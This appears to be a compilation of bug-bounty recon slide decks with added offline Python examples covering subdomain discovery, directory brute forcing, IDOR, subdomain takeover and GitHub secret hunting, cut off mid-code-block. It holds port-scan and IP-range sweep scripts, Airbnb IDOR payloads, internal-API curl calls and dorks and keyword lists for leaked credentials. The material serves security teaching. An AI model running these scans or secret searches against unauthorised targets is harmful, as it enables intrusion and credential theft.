○ CMDi
○ Supports php code inj
★ Unknown Identification
○ Backslash Powered Scanner
★ resources: albinowax (James Kettle)
IDOR - MFLAC
★ IDs
★ Hashes
★ Emails
Insecure Direct Object Reference
http://acme.com/script?user=21856
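The Privilege slides (browse as a high-priv user, re-request everything as a low-priv user, compare) and the IDOR slides (rotate the numeric `user=21856`-style identifier) are two comparisons over the same kind of data. The example below is added here and is not the Burp plugin or any tool named on the slides: it models a small in-memory application with one deliberate ownership bug, then runs both checks against the flawed server and against the fixed one. Sessions, users, receipts and endpoints are all constructed for this example.

```python
# Constructed in-memory application: two sessions, an admin-only area, and a receipts store.
USERS = {"admin-session": {"id": 1, "role": "admin"}, "bob-session": {"id": 2, "role": "user"}}
RECEIPTS = {1001: {"owner": 1, "total": 99}, 1002: {"owner": 2, "total": 5},
            1003: {"owner": 3, "total": 42}}


def handle(session, method, path):
    """Deliberately flawed mock server: /receipts/<id> never checks who owns the receipt."""
    user = USERS.get(session)
    if user is None:
        return 401, ""
    if path in ("/admin/users", "/admin/delete_user"):
        return (200, "admin ok") if user["role"] == "admin" else (403, "forbidden")
    if path.startswith("/receipts/"):
        rid = int(path.rsplit("/", 1)[1])
        if rid not in RECEIPTS:
            return 404, ""
        return 200, "total=%d" % RECEIPTS[rid]["total"]   # missing: owner == user["id"]
    return 404, ""


def handle_fixed(session, method, path):
    """Same server with the ownership check the IDOR finding calls for."""
    status, body = handle(session, method, path)
    if path.startswith("/receipts/") and status == 200:
        rid = int(path.rsplit("/", 1)[1])
        if RECEIPTS[rid]["owner"] != USERS[session]["id"]:
            return 403, "forbidden"
    return status, body


def reauthorize_check(server, high_session, low_session, browsing_log):
    """The Burp-plugin workflow: replay the high-priv log with the low-priv session and
    report every request where the low-priv user got the same successful answer."""
    findings = []
    for method, path in browsing_log:
        hi = server(high_session, method, path)
        lo = server(low_session, method, path)
        if hi == lo and hi[0] == 200:
            findings.append(path)
    return findings


def idor_rotation_check(server, session, own_id, template="/receipts/%d", spread=3):
    """Rotate a numeric identifier around the caller's own one; report foreign objects served."""
    findings = []
    for rid in range(own_id - spread, own_id + spread + 1):
        if rid == own_id:
            continue
        status, _ = server(session, "GET", template % rid)
        if status == 200:
            findings.append(template % rid)
    return findings


if __name__ == "__main__":
    log = [("GET", "/admin/users"), ("POST", "/admin/delete_user"), ("GET", "/receipts/1001")]
    print("flawed :", reauthorize_check(handle, "admin-session", "bob-session", log),
          idor_rotation_check(handle, "bob-session", 1002))
    print("fixed  :", reauthorize_check(handle_fixed, "admin-session", "bob-session", log),
          idor_rotation_check(handle_fixed, "bob-session", 1002))
```

Note what each check does and does not see: the replay finds the receipt endpoint because the admin's own receipt is served to Bob, while the rotation finds it because neighbouring identifiers answer 200; the role-gated admin functions pass both, which is the point of running the two together.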
Code Injection + CMD
Injection
★ Commix pros
○ Command injection
○ Supports php code inj
○ Custom modules
○ PS & PY shells
○ Put many memes in their slides
Backslash Powered Scanner
★ Generic payloads for any stack
○ Send a ‘ get an error
○ Send a \‘ and the backslash escapes your injection
character
★ Multi-tiered, Simple, and effective response analyzing
○ Response code
○ Response size
○ keywords
★ Watch the video then read the paper =)
○ https://broadcast.comdi.com/r7rwcspee75eewbu8a0f
○ http://blog.portswigger.net/2016/11/backslash-powered-scanning-hunting.html
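The two bullets "send a `'`, get an error; send a `\'` and the backslash escapes your injection character" are a differential test, and the response analysis is what decides whether the difference means anything. As an added example (not the Backslash Powered Scanner itself), here is that logic over three constructed mock endpoints: one that parses the parameter into a quoted string, one that ignores it, and one that strips quotes entirely. The response signature (status, length within a tolerance, error keywords) is the three-tier comparison the slide describes; the tolerance value is an assumption of this example.

```python
# Constructed mock endpoints: each maps a parameter value to (status, body). They stand in for
# a live target so that the scanner logic below can be run and checked offline.
def mock_quoted_string(value):
    """Puts the value inside a single-quoted string: an unescaped quote breaks the parse."""
    if value.count("'") - value.count("\\'") > 0:
        return 500, "Internal error: unterminated string"
    return 200, "<html>3 results for %s</html>" % value


def mock_static(value):
    """Reflects the value but never interprets it."""
    return 200, "<html>3 results for %s</html>" % value


def mock_quote_stripping(value):
    """Filters quotes and backslashes: both probes look like the baseline, so no finding."""
    return mock_static(value.replace("'", "").replace("\\", ""))


ERROR_KEYWORDS = ("error", "exception", "syntax", "unterminated", "warning")


def signature(resp):
    """Tier 1 status code, tier 2 body length, tier 3 error keywords present in the body."""
    status, body = resp
    keywords = tuple(k for k in ERROR_KEYWORDS if k in body.lower())
    return (status, len(body), keywords)


def similar(a, b, tolerance=8):
    # lengths may legitimately differ by the reflected probe characters; tolerance is an assumption
    return a[0] == b[0] and a[2] == b[2] and abs(a[1] - b[1]) <= tolerance


def backslash_probe(endpoint, base="abc"):
    """Send X, X' and X\\'. A candidate is reported only when the bare quote changes the
    response AND the escaped quote restores the baseline, i.e. the backslash was interpreted."""
    baseline = signature(endpoint(base))
    quoted = signature(endpoint(base + "'"))
    escaped = signature(endpoint(base + "\\'"))
    return {
        "baseline": baseline, "quote": quoted, "escaped": escaped,
        "candidate": (not similar(quoted, baseline)) and similar(escaped, baseline),
    }


if __name__ == "__main__":
    for name, ep in [("quoted-string", mock_quoted_string), ("static", mock_static),
                     ("quote-stripping", mock_quote_stripping)]:
        print("%-16s candidate=%s" % (name, backslash_probe(ep)["candidate"]))
```

Requiring the escaped probe to match the baseline is what separates "this parameter is parsed" from "this parameter is noisy": an endpoint whose responses vary for every input would fail the second condition and stay quiet.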
Infrastructure & Config
Subdomain takeover!
★ Dev.domain.com
★ Stage.domain.com
★ ww1/ww2/ww3...domain.com
★ www.domain.uk/jp/...
★ ...
★ https://twitter.com/Jhaddix/status/964714566910279680
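The takeover candidates listed above (dev, stage, ww1/ww2, country sites) share one shape: a CNAME still in the zone whose target is no longer claimed. As an added example (not from the slides), here is the check run as a zone audit: for every CNAME, resolve the target and flag NXDOMAIN, then fetch the target and flag a provider's "unclaimed" page. The zone snapshot, resolver answers, page bodies and the unclaimed-page fingerprints are all constructed for this example and do not describe any real provider.

```python
# Constructed zone snapshot: name -> (record type, value). Hostnames are made up.
ZONE = {
    "dev.domain.com": ("CNAME", "dev-site.example-host.net"),
    "stage.domain.com": ("CNAME", "stage-bucket.example-storage.net"),
    "www.domain.com": ("A", "1.2.3.4"),
    "ww1.domain.com": ("CNAME", "old-campaign.example-pages.net"),
}
# Constructed resolver results for the CNAME targets: list of addresses, or None for NXDOMAIN.
RESOLVE = {
    "dev-site.example-host.net": ["5.6.7.8"],
    "stage-bucket.example-storage.net": None,
    "old-campaign.example-pages.net": ["5.6.7.9"],
}
# Constructed page bodies returned by the targets that resolve.
BODIES = {
    "dev-site.example-host.net": "<html>Dev site is up</html>",
    "old-campaign.example-pages.net": "<html>There isn't a site here yet</html>",
}
# Hypothetical fingerprints of an unclaimed-resource page (assumed values for this example).
UNCLAIMED_FINGERPRINTS = ("isn't a site here", "no such app", "bucket does not exist")


def dangling_cnames(zone, resolve, fetch_body):
    """Return (name, target, reason) for every CNAME whose target is NXDOMAIN or serves an
    unclaimed-resource page; both are what a takeover review is looking for."""
    findings = []
    for name, (rtype, target) in sorted(zone.items()):
        if rtype != "CNAME":
            continue
        addrs = resolve(target)
        if addrs is None:
            findings.append((name, target, "target NXDOMAIN"))
            continue
        body = (fetch_body(target) or "").lower()
        if any(fp in body for fp in UNCLAIMED_FINGERPRINTS):
            findings.append((name, target, "target serves unclaimed-resource page"))
    return findings


if __name__ == "__main__":
    for finding in dangling_cnames(ZONE, RESOLVE.get, BODIES.get):
        print("%s -> %s: %s" % finding)
```

The same routine run against your own zone on a schedule is the cheapest fix: a CNAME whose target no longer resolves should be deleted, not left for someone else to claim.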
SOAP Services
Bespoke .nfo
resources!
Resources
SSRF: Pivoting from blind SSRF to RCE with HashiCorp Consul - Peter Adkins - http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html
OWASP SSTI Workshop - Gérôme Dieu - https://speakerdeck.com/owaspmontreal/workshop-server-side-template-injection-ssti
Hi Pete!
Rails Dynamic Render to RCE (CVE-2016-0752) - John Poulin - https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/
Links
aboul3la https://github.com/aboul3la/Sublist3r
jhaddix https://github.com/jhaddix/domain
blechschmidt https://github.com/blechschmidt/massdns
robertdavidgraham https://github.com/robertdavidgraham/masscan
anshumanbh https://github.com/anshumanbh/brutesubs
OJ Reeves https://github.com/OJ/gobuster
epinna https://github.com/epinna/tplmap
https://github.com/mak-/parameth
https://gist.github.com/anshumanbh/96a0b81dfe318e9e956013209e178fa9
https://github.com/ChrisTruncer/EyeWitness
https://github.com/jackmasa/XSS.png
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
https://github.com/lorenzog/dns-parallel-prober
SSRF Bible https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#
https://github.com/ewilded/psychoPATH
https://github.com/commixproject/commix
https://github.com/qazbnm456/awesome-web-security
https://github.com/infoslack/awesome-web-hacking
https://github.com/djadmin/awesome-bug-bounty
Jason Haddix - @jhaddix
jhaddix@bugcrowd.com
The Bug Hunters
Methodology v3(ish)
Video: https://www.youtube.com/watch?v=Qw1nNPiH_Go
whoami
history && topics
★ https://whois.arin.net/ui/query.do
★ https://apps.db.ripe.net/db-web-ui/#/fulltextsearch
Rev whois
★ https://reverse.report/
Shodan Organization
★ https://www.shodan.io/search?query=org%3A%22Tesla+Motors%22
Discovering New Targets
(Brands & TLDs)
Brand / TLD Discovery
Weighted Link and REVERSE TRACKER analysis:
★ DomLink
★ Builtwith
Acquisitions
Linked Discovery (Burp Demo)
#!/bin/bash
# usage: ./amass.sh <domain>; run it from /root/tools/amass so the relative and absolute paths agree
mkdir -p "$1"
touch "$1/$1.txt"
amass -active -d "$1" | tee "/root/tools/amass/$1/$1.txt"
Sublist3r Subfinder
● Subfinder by ICEMAN
● https://github.com/ice3man543/subfinder
● Json output, multi resolver for bruteforce, ++
#!/bin/bash
# usage: ./subfinder.sh <domain>; run it from /root/tools/subfinder so the relative and absolute paths agree
mkdir -p "$1"
touch "$1/$1.txt"
subfinder -d "$1" | tee "/root/tools/subfinder/$1/$1.txt"
Fancy table referencing runtimes ++
all.txt
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
CommonSpeak and Scans.io data
Tool | Time to run | Found
nmap | zzz | ∞
#!/bin/bash
# usage: ./mass.sh <url-or-host>; strips the scheme, prints the DNS answer, then runs a
# full-range masscan against the first A record and saves the output to <host>_scan
strip=$(echo "$1" | sed 's/https\?:\/\///')
echo ""
echo "##################################################"
host "$strip"
echo "##################################################"
echo ""
# note: the original wrote to $strip_scan, which expands the (unset) variable "strip_scan";
# ${strip}_scan is the intended file name
masscan -p1-65535 "$(dig +short "$strip" | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | head -1)" \
  --max-rate 1000 |& tee "${strip}_scan"
Credential bruteforce
Brutespray: Nmap service scan (-oG) or masscan output → Brutespray credential bruteforce
https://github.com/x90skysn3k/brutespray
Visual Identification
★ Because of the nature of scraping and dns redirects some sites will be gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don’t know what protocol these are on (http vs https, ++)
Aquatone? Httpscreenshot?
Wayback Enumeration
TIME OUT
Xmind Organization
Content Discovery / Directory Bruting
★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
★ https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10
★ But still gold
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 alexa params
Workflow:
1. Identify IPs and main TLDs: ASNs, Reverse Whois, Acquisitions, ++
2. Domain scraping for discovered TLDs: aMASS, SUBFINDER, Manual
3. Domain bruteforcing, Resolve && add new IP ranges: Massdns, ++
4. Portscan: masscan
5. Visual Identification: eyewitness
Tools: Builtwith, Wappalyzer, gobuster, Wordlists, Parameth, Burp, Burp analyze target, ++
XSS
Blind XSS Frameworks Continued!
SMS Support
Server Side Request
Forgery
What to do with SSRF?
https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b
The future of TBHM
Old
@nahamsec
AGENDA
1. Overview
2. Asset Discovery
3. Content Discovery
4. Automation
5. Digital Dumpster Diving
6. Real Life Examples
Why?
● Self improvement
● Networking
● My career was built / boosted thanks to bug bounties
● Competition makes it more fun
● … who doesn’t like extra cash?
Reconnaissance
Recon (Definition)
In military operations, reconnaissance or scouting is the exploration outside an area occupied by friendly forces to gain information about natural features and other activities in the area.
Recon (Definition)
● Understanding how the application is built
● Understanding how the application processes data
● Finding all possible “entry” points or company assets
● and finding as many files, folders, or endpoints
Asset Discovery
● Brute force
● Find different environments (.dev, .corp, .stage, uat, etc.)
● Brute force again
○ Different permutations
○ Different environment
■ dashboard.dev.site.com vs dashboard-dev.site.com
Tools:
● sublist3r
● enumall
● massdns
● altdns
● brutesubs
● dns-parallel-prober
● dnscan
● knockpy
● tko-subs
● HostileSubBruteforce
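The "Brute force again" step above and the Permutation Scanning slide in the earlier deck (Altdns, SDBF) are the same idea: take the names you already know, splice environment labels into them in every shape (`dashboard.dev.site.com`, `dashboard-dev.site.com`, `dev.dashboard.site.com`, `devdashboard.site.com`), then resolve the candidates and keep only the ones that answer. The example below is added here and is not altdns or any tool on the slides; the seed names, the environment list and the fake resolver are constructed for this example.

```python
# Constructed seeds (what a scraper would already have returned) and a fake resolver so the
# example runs offline. Addresses are sample values.
SEEDS = ["dashboard.site.com", "api.site.com"]
ENVIRONMENTS = ["dev", "stage", "uat", "corp"]   # the environment labels named on the slide
KNOWN = {"dashboard-dev.site.com": "10.1.0.7", "dev.api.site.com": "10.1.0.9", "api.site.com": "1.2.3.4"}


def permutations(seeds, apex, envs=ENVIRONMENTS):
    """Candidates from each seed label L and environment E:
    L.E.apex, L-E.apex, E.L.apex and EL.apex; seeds themselves are excluded."""
    out = set()
    for host in seeds:
        if not host.endswith("." + apex):
            continue
        label = host[: -len(apex) - 1]
        for env in envs:
            out.update({
                "%s.%s.%s" % (label, env, apex),
                "%s-%s.%s" % (label, env, apex),
                "%s.%s.%s" % (env, label, apex),
                "%s%s.%s" % (env, label, apex),
            })
    return sorted(out - set(seeds))


def resolve_and_add(candidates, resolve):
    """The 'Resolve && add' step of the workflow: keep only names the resolver answers for,
    with the address that came back, so new IP ranges can be fed to the port scan."""
    found = {}
    for name in candidates:
        addr = resolve(name)
        if addr:
            found[name] = addr
    return found


if __name__ == "__main__":
    cands = permutations(SEEDS, "site.com")
    print(len(cands), "candidates, e.g.", cands[:4])
    print("resolving:", resolve_and_add(cands, KNOWN.get))
```

With a real resolver the candidate list is the input to massdns; generating the four shapes per label is what finds the `dashboard-dev` variant that a plain wordlist brute force would miss.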
Certificate Transparency
How do you find more?
Censys
● Look for SSL certificates:
○ Example: 443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names:snapchat.com
Shodan
● Search by hostname
● Filter for
○ Ports: 8443, 8080, 8180, etc
○ Title: “Dashboard [Jenkins]”
○ Product:Tomcat
○ Hostname: somecorp.com
○ Org: evilcorp
○ ssl: Google
Certspotter
● Great API
● Easy to automate: We’ll get to this later
○ Make a bash alias
○ Automate
○ Win
Crt.sh
● Great API and web interface
● Allows using a wild card
● Sometimes you get different results from different sources
https://crt.sh/?q=www.snapchat.%
OSINT
What about other properties?
Acquisitions
ARIN
Shodan also helps with this
Content Discovery
Where the fun begins
Content Discovery
● Port scan
● Screenshot open ports (default: 80, 443)
● Look for interesting
○ Files
○ Directories
Example
● You see an open port on example.com:8433
● Directory brute force
● /admin/ returns 403
● You brute force for more files/directories on /admin/
● /admin/users.php returns 200
● Repeat on other domains, ports, folders, etc.
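The example above and the Directory Bruteforce Workflow slide in the first deck ("look for status codes indicating you are denied or require auth, then append the list there") describe the same triage of a brute-force result set. As an added example (not from either deck, and not gobuster or dirsearch), here is that triage over a constructed set of `(path, status)` results: bucket by status, build the next round of requests under every denied directory, and report the finding the workflow is after, a 200 beneath a directory that itself answered 401/403. The result set and the short wordlist are constructed.

```python
# Constructed scan results as (path, status), the shape a gobuster/dirsearch run yields.
RESULTS = [
    ("/", 200), ("/images/", 200), ("/admin/", 403), ("/login", 200), ("/api/", 401),
    ("/backup/", 404), ("/old/", 301), ("/admin/users.php", 200), ("/api/v1/users", 200),
]
# Constructed short list to append under denied directories (stands in for a SecLists file).
SHORTLIST = ["users.php", "config.php", "v1/users", "index.php"]


def triage_statuses(results):
    """Group paths by what the status code tells us to do next."""
    buckets = {"found": [], "denied_recurse": [], "redirect_follow": [], "noise": []}
    for path, status in results:
        if status in (401, 403):
            buckets["denied_recurse"].append(path)      # append the wordlist here
        elif status in (301, 302, 307, 308):
            buckets["redirect_follow"].append(path)
        elif 200 <= status < 300:
            buckets["found"].append(path)
        else:
            buckets["noise"].append(path)
    return buckets


def next_round(results, wordlist=SHORTLIST):
    """Requests to make under every denied directory: misconfigured access control often
    protects the directory index but not the files inside it."""
    denied = [p for p in triage_statuses(results)["denied_recurse"] if p.endswith("/")]
    return [d + w for d in denied for w in wordlist]


def access_control_gaps(results):
    """A 200 under a directory that itself answered 401/403 is the finding."""
    denied = triage_statuses(results)["denied_recurse"]
    return [p for p, s in results
            if s == 200 and any(p.startswith(d) and p != d for d in denied)]


if __name__ == "__main__":
    print("denied:", triage_statuses(RESULTS)["denied_recurse"])
    print("next round:", next_round(RESULTS))
    print("gaps:", access_control_gaps(RESULTS))
```

From the defender's side the `access_control_gaps` output is the list of paths whose protection lives on the directory index rather than on the handler, which is where the fix belongs.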
Content Discovery
● Nmap common ports (3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443)
● Take screenshots (webscreenshot.py)
● Directory/File brute force
○ dirbuster
○ gograbber
○ gobuster
○ dirsearch
○ Probably more tools out there?
● Robots.txt sometimes does this for you ¯\_(ツ)_/¯
Content Discovery
● ALWAYS keep an archive of your reports..
Automation
AWS Recon
S3 Automation
Certspotter
● Great API
● Easy to automate:
○ Make an alias
○ Automate
○ Win
Create aliases
certspotter(){
# the output directory must exist before the redirect below opens ~/$1/$1.txt
mkdir -p ~/"$1"
curl -s "https://certspotter.com/api/v0/certs?domain=$1" | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep "$1" > ~/"$1"/"$1".txt
}
dirbruteforce(){
# run in a subshell so the cd does not change the caller's working directory,
# which screenshot() below relies on for its relative output path
(cd /tools/dirsearch && while read -r line; do python3 dirsearch.py -e . -u "https://$line"; done < ~/"$1"/"$1".txt)
}
screenshot(){
python ~/tools/webscreenshot/webscreenshot.py -o ./"$1"/screenshots/ -i ~/"$1"/"$1".txt --timeout=10 -m
}
recon(){
certspotter "$1"
dirbruteforce "$1"
screenshot "$1"
}
Game changer
Put your aliases together
recon(){
certspotter "$1"
dirbruteforce "$1"
screenshot "$1"
[...]
}
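The `certspotter` alias above is a five-stage pipeline: flatten `dns_names` out of the JSON, strip quotes, drop the `*.` wildcard prefix, dedupe, keep names matching the domain. As an added example (not the alias itself), here is the same pipeline in Python over a constructed response in the shape of the v0 API's JSON array, with one difference worth knowing: the alias's `grep $1` is a substring match and would also keep `dev-snapchat.example.net`, so this version matches on the domain suffix. The certificate objects and names are constructed.

```python
import json

# Constructed sample in the shape the alias pipes into jq: an array of certificate objects,
# each with a dns_names list. Every value here is made up.
SAMPLE_RESPONSE = json.dumps([
    {"id": "1", "dns_names": ["www.snapchat.example", "*.snapchat.example"]},
    {"id": "2", "dns_names": ["api.snapchat.example", "www.snapchat.example"]},
    {"id": "3", "dns_names": ["cdn.other.example", "*.feelinsonice.example"]},
    {"id": "4", "dns_names": ["dev-snapchat.example.net"]},
])


def certspotter_hosts(response_text, domain):
    """jq '.[].dns_names[]' | sed 's/\\"//g' | sed 's/\\*\\.//g' | sort -u | grep, in Python."""
    domain = domain.lower()
    names = set()
    for cert in json.loads(response_text):
        for n in cert.get("dns_names", []):
            n = n.lower()
            if n.startswith("*."):
                n = n[2:]                       # the wildcard's base name is still a host to look at
            # exact suffix match instead of the alias's substring grep
            if n == domain or n.endswith("." + domain):
                names.add(n)
    return sorted(names)


def write_hostlist(path, hosts):
    """The '> ~/$1/$1.txt' step: one host per line, the input the other aliases read."""
    with open(path, "w") as f:
        f.write("\n".join(hosts) + "\n")
    return len(hosts)


if __name__ == "__main__":
    hosts = certspotter_hosts(SAMPLE_RESPONSE, "snapchat.example")
    print("\n".join(hosts))
```

Against the live API the `response_text` is what `curl -s` returns; everything after that is unchanged, which is the point of keeping the parse separate from the fetch.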
LazyRecon
Digital Dumpster Diving
(I’m a pro at it)
Digital Dumpster Diving
● Leaked credentials
● Leaked api_tokens
● Leaked authorization headers
● […]
Github Recon
Tools and Keywords
● gitrob
● git-all-secrets
● truffleHog
● git-secrets
● repo-supervisor
● Do it manually?
Github Recon Examples (search terms):
● “company.com” “dev”
● “dev.company.com”
● “company.com” API_key
● “company.com” password
● “api.company.com” authorization
● GET CREATIVE!
Keywords: APP_SECRET, consumerkey, JIRA_Password, jdbc, “authorization bearer”, auth_key, consumer_secret, SECURITY-SIGNATURE, X-API, X-Paypal, secret_key, JWK/JWT, SSO_LOGIN, defaultEndpointsProtocol, access_key, accountKey, AWS_Secret, aws_secret_access_key, rexis, api_key
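The keyword list above is what the named tools (truffleHog, git-secrets, repo-supervisor) grep for, usually combined with regexes for the shape of the secret itself. As an added example (not any of those tools), here is a scanner that runs both the slide's keywords and a few well-known token shapes over a constructed config file, and a redaction helper so a finding can be reported without copying the value into the report. The regexes for token shapes and the sample file are assumptions of this example; the keywords are the slide's.

```python
import re

# Keywords from the slide (matched case-insensitively).
KEYWORDS = ["APP_SECRET", "consumerkey", "JIRA_Password", "jdbc", "authorization bearer",
            "auth_key", "consumer_secret", "SECURITY-SIGNATURE", "X-API", "X-Paypal",
            "secret_key", "SSO_LOGIN", "defaultEndpointsProtocol", "access_key", "accountKey",
            "AWS_Secret", "aws_secret_access_key", "api_key"]
KEYWORD_RE = re.compile("|".join(re.escape(k) for k in KEYWORDS), re.IGNORECASE)

# Token-shape patterns (assumed for this example; AKIA is the documented AWS access key prefix).
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\b"),
    "bearer": re.compile(r"""(?i)authorization["']?\s*:\s*["']?bearer\s+[A-Za-z0-9._-]{8,}"""),
}

# Constructed sample file; every value is made up.
SAMPLE_FILE = """\
# config.example
jdbc.url=jdbc:mysql://db.internal:3306/app
aws_secret_access_key = abcd1234abcd1234abcd1234abcd1234abcd1234
AWS_ACCESS_KEY_ID=AKIAEXAMPLEEXAMPLE12
log.level=info
headers: {"Authorization": "Bearer sometokenvalue123"}
session=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjMifQ.sig_constructed
"""


def scan(text):
    """(line number, sorted kinds, stripped line) for every line that trips a keyword or a pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        kinds = set()
        if KEYWORD_RE.search(line):
            kinds.add("keyword")
        for name, rx in PATTERNS.items():
            if rx.search(line):
                kinds.add(name)
        if kinds:
            findings.append((lineno, sorted(kinds), line.strip()))
    return findings


def redact(line):
    """Mask the first value after '=' or ':' so a finding can be reported without re-leaking it."""
    return re.sub(r"([=:]\s*)(\S+)",
                  lambda m: m.group(1) + "*" * min(len(m.group(2)), 8), line, count=1)


if __name__ == "__main__":
    for lineno, kinds, line in scan(SAMPLE_FILE):
        print("%2d %-28s %s" % (lineno, ",".join(kinds), redact(line)))
```

Keyword hits (`jdbc`, the `log.level`-style false positives you will also get on real repositories) need a human to confirm them; the shape-based hits are the ones worth rotating first.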
Archive.org (Wayback Machine)
67 @nahamsec
Javascript Files
Why?
69 @nahamsec
Javascript Files
Examples
72 @nahamsec
Trello Boards
● Site:trello.com intext:ftp
● Site:trello.com intext:ORG
73 @nahamsec
Examples
75
Examples of Certificate
Transparency
76
Shodan Examples
Search Query: hostname:host.com port:15672
77 @nahamsec
Censys Examples
● Working example:
78 @nahamsec
Examples of
Discovering Endpoints
Hidden Inside of
Javascript Files
79
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
80 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
API Requests
https://www.airbnb.com/api/v2/air_sms_notifications
81 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
API Requests
https://www.airbnb.com/api/v2/air_push_notifications
82 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
POST REQUEST:
{"_format":"for_visitor","country":"USA","phone_number":"","template":"message","user_id":,"title":"","body":"","metadata":{},"object_id":"","status":"","role":"","photo_url":""}
If you passed in an invalid template it would give you a list of all the valid templates that you could send.
83 @nahamsec
84 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
Then we found out we can send ourselves custom messages:
{"_format":"for_visitor","country":"USA","phone_number":"","template":"custom","user_id":109764261,"status":"test","title":"test","body":"test"}
85 @nahamsec
Examples of Digital
Dumpster Diving
89
Dumpster Diving Part 1
90 @nahamsec
Dumpster Diving Part 1
"server": {
"host": "dedXXXX.PATTERN.PROVIDER.com",
"port": 21,
"user": "some_username",
"password": "definitely_ftp_passwords"
}
91 @nahamsec
Dumpster Diving Part 2
93 @nahamsec
Example of
Readable/Writable S3
Buckets
97
AWS CLI
98 @nahamsec
CNAME Pointing to Unclaimed AWS S3
99 @nahamsec
Recon Automation +
Github +
Exploitation
100
101@nahamsec
Access to all internal API endpoints?
102@nahamsec
● Looked for hostname + internal + “auth-token” on github and found this handy curl command:
104@nahamsec
Access to all internal API endpoints?
curl -X GET "https://devsomething.something.target.com/internal/internal_something/internal_something_accounts" -H "SOME_KEYWORD-auth: INTERNAL" -H "debug-token: SORRY_I_HAD_TO_REDACT"
107@nahamsec
Access to all internal API endpoints?
curl -X GET "https://devsomething.something.target.com/internal/internal_accounts" -H "SOME_KEYWORD-auth: INTERNAL" -H "debug-token: SORRY_I_HAD_TO_REDACT"
108@nahamsec
Keep in touch
110@nahamsec
Tools
● Dirsearch - https://github.com/maurosoria/dirsearch
● JSParser - http://github.com/nahamsec/jsparser
● LazyS3 - https://github.com/nahamsec/lazys3
● LazyRecon - https://github.com/nahamsec/lazyrecon
● Teh_s3_bucketeers - https://github.com/tomdev/teh_s3_bucketeers
111@nahamsec
Thank you
112@nahamsec
Recon Like A Boss
More Targets- More Options-
More Opportunities
AGENDA
• Increase Your Attack Area
• Determine Technologies used by Website.
• Amazon Web Service (AWS) Recon & Hacking
• Github Recon
• Content Discovery
Increase Your
Attack Area
Recon- Go Back in Time
• Wayback Machine to view old files like robots.txt and URLs
• Tools are out to automate this
• waybackurls.py
Download: https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
• waybackrobots.py
Download: https://gist.github.com/mhmdiaa/2742c5e147d49a804b408bfed3d32d07
Now We Have
Waybackurls
Sub-domains Discovery
• Brute force on main domain
• Some scripts to automate this task
– Knockpy:-
https://github.com/guelfoweb/knock
– Sublist3r:-
https://github.com/aboul3la/Sublist3r
– SubBrute
https://github.com/TheRook/subbrute
Sub-domains Discovery
Knockpy
• Usage: ./knockpy target.com
Sub-domains Discovery
Sublist3r
• Usage: python sublist3r.py -d target.com
Sub-domains Discovery
Sublist3r Cont.
• Find sub-domains with specific open ports
• Usage: python sublist3r.py -d target.com -p 80,443
Sub-domains Discovery
SubBrute
Tool: SubBrute
Usage:
./subbrute.py target.com > subdomains.txt
Then
./subbrute.py -t subdomains.txt
Now We Have
WaybackURls
+
Subdomains
+
Subdomains of Subdomains
Sub-domain Validation
Tool: EyeWitness (https://github.com/ChrisTruncer/EyeWitness)
Real Case Study
IP range: 98.136.0.0 - 98.139.255.255
Bash Script
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
  wget -t 1 -T 5 http://${ipa}/phpinfo.php
done &
• And Finally
http://nc10.n9323.mail.ne1.yahoo.com/phpinfo.php
Find New Endpoints from JS Files
(Tools Intro.)
1. Burp Suite
2. InputScanner (Zscanner)
3. JS-Scan
• Burp Suite: Proxy
AWS or S3 Buckets
Amazon Web Services
• AWS Simple Storage Service (often shortened
to S3) is used by companies that don’t want to
build and maintain their own storage
repositories
• By using Amazon Simple Storage Service, they
can store objects and files on a virtual server
instead of on physical racks
Amazon Web Services
• After the user has created their bucket, they
can start storing their source code,
certificates, passwords, content, databases
and other data.
Amazon Web Services
• API Endpoints
• Domain Patterns
Github Recon
• Go to github and search
Eg.
- “target.com” “dev”
- “dev.target.com”
- “target.com” API_key
- “target.com” password
- “api.target.com”
• Google can also help
Dork:
site: “github.com” + “Target” + password
Tools are out to automate this
• Gitrob
• Git-all-secrets
• truffleHog
• Git-secrets
• Repo-supervisor
• Do it manually [Best way]
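Both Github Recon sections (nahamsec's keyword list above and the search terms in this deck) come down to the same thing: strings such as api_key, AWS_Secret, aws_secret_access_key, consumer_secret, "authorization bearer" and jdbc sitting next to a value. The scanner below is an added example, not any of the tools named on the slides (gitrob, truffleHog, git-secrets, ...); it is the check a defender runs as a pre-commit hook or over a repository export so that these strings never reach a public repo. Pattern names, the placeholder list and the sample config are constructed for the example.

```python
# Added example: secret-pattern scanner around the keyword families the
# GitHub recon slides list. Illustrative code, not one of the tools named
# on the slides. All sample content below is constructed.
import re
import sys
from dataclasses import dataclass
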